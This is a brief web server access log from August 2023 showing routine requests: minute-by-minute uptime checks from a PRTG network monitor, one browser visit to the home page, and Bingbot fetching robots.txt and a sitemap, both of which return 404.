212.91.246.72 - - [06/Aug/2023:22:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:49:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.243.167.36 - - [06/Aug/2023:22:50:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:22:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:51:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:52:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.56 - - [06/Aug/2023:22:53:11 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.38 - - [06/Aug/2023:22:53:20 +0200] "GET /sitemaps.xml HTTP/1.1" 404 317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
